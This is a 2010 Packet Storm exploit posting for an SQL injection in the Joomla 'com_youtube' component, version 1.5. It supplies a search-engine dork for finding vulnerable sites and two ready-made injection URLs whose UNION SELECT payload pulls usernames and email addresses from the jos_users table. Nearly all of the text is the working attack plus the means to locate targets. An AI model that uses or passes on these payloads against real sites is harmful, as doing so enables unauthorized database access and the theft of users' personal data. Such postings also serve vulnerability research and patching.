Joomla Youtube SQL Injection

2010-07-26T00:00:00
ID PACKETSTORM:92160
Type packetstorm
Reporter Forza-Dz
Modified 2010-07-26T00:00:00

Description

                                        
                                            `# Exploit Title: Joomla "com_youtube" Sql Injection Vulnerability  
# Date: 2010-07-24  
  
# Author: Forza-Dz  
  
# Software Link: http://extensions.joomla.org/extensions/multimedia/  
multimedia-channels/video-channels/12037  
# Version: 1.5  
# Tested on: windows-xp-sp2-fr : windows-xp-sp3-fr  
  
  
==============================================================================  
\\\\\\\\\\ Joomla "com_youtube" Sql Injection Vulnerability /////////  
==============================================================================  
  
***************************************************************************  
***************************************************************************  
Dork = inurl:"com_youtube"  
###########################################################################  
===[ Exploit ]===  
http://www.site.com/index.php?option=com_youtube&id_cate=4  
  
union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--  
or  
http://www.site.com/index.php?option=com_youtube&id_cate=55  
union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--  
###########################################################################  
Greetz @ Flit0x-Dz AnD MCA-CRB All "DZ" "MusliM"   
###########################################################################  
  
`